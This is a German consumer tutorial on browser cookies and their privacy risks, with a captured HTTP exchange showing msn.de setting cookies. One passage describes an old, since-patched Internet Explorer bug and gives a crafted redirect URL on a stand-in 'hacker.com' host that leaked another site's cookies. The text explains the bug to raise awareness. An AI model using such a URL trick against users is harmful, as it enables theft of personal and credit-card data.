Gefahren im WWW

Hast Du Dich schon mal gefragt, warum eigentlich der Onlineshop, bei dem Du vor Monaten einmal etwas bestellt hattest, immer noch weiß, was es genau war und Dich vielleicht sogar mit Deinem Namen begrüßt, sobald Du auf die betreffende Seite surfst ?

So etwas geschieht durch Cookies. Cookies sind kleine Stückchen von Text- oder Zahleninformation, die Dein Browser in einer Datei speichert und sie bereitwillig jedes Mal ausplaudert, wenn er von einem Server (der selben Domäne, aber auch da gibt’s Ausnahmen) Seiten abruft. Nachdem Du diesen Text gelesen hast, bestimmst Du, ob und welche Cookies auf Deinem Rechner liegen und wer sie lesen darf ! J

Der Name Cookie stammt von dem englischen Wort für „Küchlein“, die es ja auch mit eingebackenen Textinhalten gibt. Genau so wie es gute und schlechte Kekse gibt, sind Situationen denkbar, in denen Du Cookies akzeptieren möchtest. Beispiele sind

Wenn Du die Seite mit der Watchlist für Dein Aktiendepot ansiehst, wirst Du nicht jedes Mal von neuem nach Deinem Passwort gefragt. Du wurdest von der Website darauf hingewiesen, dass dies durch Cookies geschieht und bist Dir der Konsequenzen bewusst (jeder, der diese Seite von Deinem Rechner aus ansurft, sieht die von Dir beobachteten Aktien !).

Du hast in Deiner Lieblings-Suchmaschine eingestellt, dass Du immer nur Suchergebnisse von deutschen und englischen Seiten erhalten möchtest, die aber z.B. alphabetisch angezeigt werden sollen und zwar nicht 10 Ergebnisse pro Seite sondern 50. Diese Feineinstellung könnte die Suchmaschine in einem Cookie bei Dir ablegen wollen, das Du in diesem bestimmten Fall akzeptierst.

In einem bestimmten Onlineshop kaufst Du regelmäßig z.B. Bücher und bist froh, nicht jedes mal wieder Name, Adresse und Kreditkartennummer angeben zu müssen. Sobald Du den Onlineshop für einen erneuten Kauf besuchst, kann er die nötigen Infos aus dem Cookie entnehmen.

So, das klingt eigentlich ganz gut, ja ? Der dritte Fall auch ? Vorsicht ! Dieses Beispiel ist bereits hoch riskant, denn es werden persönliche Daten gespeichert und obwohl ein Cookie immer nur zu dem „Host“ (Rechner) bzw. der Domäne (Rechnerverbund) zurückgesendet werden soll, die es erzeugt hat, gibt es Möglichkeiten, diese Einschränkung zu umgehen und sei es nur durch einen Bug (Fehler) im Browser.

Konkret heißt das: Jeder Website, der es gelingt, den Cookie aus Beispiel 3 zu lesen, kennt Deinen Namen, Deine Adresse und ... Deine Kreditkartennummer !!!

Und jetzt der Hammer:

Ich zeige Dir nun, dass und wie man unter bestimmten Umständen Cookies fremder Domänen auslesen kann:

Betroffen sind alle bis zum Mai 2000 bekannten Versionen des Internet Explorers für Windows 95, 98, NT und Windows 2000. Durch Weiterleitung des Surfers durch eine speziell zusammen gesetzte URL kann ein Webmaster (Webseiten-Betreiber) Cookies fremder Domänen lesen. Möchte z.B. die Domäne hacker.com wissen, welche Cookies der Surfer von amazon.de gespeichert hat, so leitet sie ihn weiter nach:

http://www.hacker.com/security/iecookies/showcookie.html?.amazon.de

Der Internet Explorer missinterpretiert jedoch die Syntax und sendet den Inhalt der Amazon-Cookies mit.

Du findest weitere Infos und kannst den Bug selbst testen unter folgender URL:

http://www.peacefire.org/security/iecookies/

Dies ist nur einer von vielen Bugs eines Browsers. Unabhängig davon, ob Du den seit 18.05.2000 bei Microsoft erhältlichen Patch (http://www.microsoft.com/technet/security/bulletin/ms00-033.asp) eingespielt hast: Kannst Du sicher sein, dass für Deine Situation kein Bug existiert ?

Mit diesen Informationen möchte ich Dich sensibilisieren, genau zu prüfen, ob und wann Du Cookies benötigst. Hierzu solltest Du wissen, wie Cookies entstehen und dass sie ständig versendet werden.

Wie kommt man überhaupt zu so einem Cookie ?

Falls Du die Voreinstellungen Deines Browsers nicht geändert hast, so akzeptiert dieser jedes Cookie von jedem Rechner aus jeder Domäne (eine Domäne ist eine Art Rechnerverbund, z.B. alle Rechner von Microsoft.de) !

Ich lade Dich nun ein, mir über die Schulter zu schauen und „gefahrlos“ mit zu erleben, was alles im Zusammenhang mit Cookies passiert, sobald ich im Browser eine Seite eingebe, die Cookies verwendet. Als Beispiel wird die Startseite von Microsoft Network http://www.msn.de gewählt. Zuvor wurden alle vorhandenen Cookies gelöscht und die Browser-Einstellungen auf „Cookies akzeptieren“ gesetzt.

Nach Eingabe der URL (Universal Resource Loader, also der „Web-Adresse“) fordert der Browser von dem angegebenen Zielrechner die Daten der Startseite (index.htm oder index.html) mittels HTTP (Hyper Text Transfer Protokoll) an. Wenn man nun von allen Daten, die über die Leitung gehen, nur die HTTP-Daten mitliest, so entsteht folgende Kommunikation:

GET / HTTP/1.0

User-Agent: Mozilla/4.76 [en] (Windows NT 5.0; U)

Host: www.msn.de

Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*

Accept-Encoding: gzip

Accept-Language: de,en,en-US

Accept-Charset: iso-8859-1,*,utf-8

HTTP/1.1 302 Object moved

Server: Microsoft-IIS/5.0

Date: Sat, 12 May 2001 11:40:01 GMT

Location: http://msid.eu.msn.com/mps_id_sharing/redirect.asp?www.msn.de/Default.asp

Connection: Keep-Alive

Content-Length: 194

Content-Type: text/html

Expires: Sat, 12 May 2001 10:40:02 GMT

Set-Cookie: MC1=V=2&ID=7F45E927DAF24EBD86F0EEDE22F41FC5; expires=Sat, 04-Oct-2003 11:00:00 GMT; path=/

Set-Cookie: MSNATLANTIS%5FVER=2%2E0; expires=Thu, 11-May-2006 23:00:00 GMT; path=/

Cache-control: private

Der erste Block (blau) ist die Anfrage des Browsers, der zweite Block (dunkelrot) die Antwort des Servers, die eine Aufforderung zum Setzen eines Cookies enthält (rot). Falls der Browser Cookies akzeptieren darf, wird die übertragene Information im File cookies.txt (siehe unten) gespeichert.

Die anderen Zeilen sollen Dir einen Eindruck vermitteln, in welchem Zusammenhang Cookies auftreten und werden näher im Kapitel User Tracking behandelt.

Zu diesem Zeitpunkt ist etwa erst ein Dreissigstel (!) der Kommunikation abgeschlossen, die allein zum Aufbau der Startseite von www.msn.de statt findet. In den folgenden übertragenen Daten finden sich insgesamt 8 Anfragen an den Browser, Cookies zu setzen. Nota bene: dies alles während des Aufbaus der ersten Seite !

Aus diesem recht langen Datenstrom habe ich alle Transfers herausgefiltert, die mit Cookies zu tun haben. Dabei sind Aufforderungen zum Setzen von Cookies wieder rot, freiwillig übertragene Informationen bereits bestehender Cookies blau.

Set-Cookie: MC1=V=2&ID=7F45E927DAF24EBD86F0EEDE22F41FC5; expires=Sat, 04-Oct-2003 11:00:00 GMT; path=/

Set-Cookie: MSNATLANTIS%5FVER=2%2E0; expires=Thu, 11-May-2006 23:00:00 GMT; path=/

Set-Cookie: MC1=V=2&GUID=97C562dc3ed2267e8bf5a7a1aff8AD62; expires=Sat, 04-Oct-2003 11:00:00 GMT; domain=.msn.com; path=/

Set-Cookie: ASPSESSIONIDQQGQGMRC=BDAPKOLAGEBBNCHJKGCDAKHK; path=/

Cookie: MC1=V=2&ID=7F45E927DAF24EBD86F0EEDE22F41FC5; MSNATLANTIS%5FVER=2%2E0

Set-Cookie: MSNATLANTIS%5FVER=2%2E0; expires=Thu, 11-May-2006 23:00:00 GMT; path=/

Set-Cookie: MC1=V=2&GUID=97c562dc3ed2267e8bf5a7a1aff8ad62; expires=Sat, 04-Oct-2003 11:00:00 GMT; path=/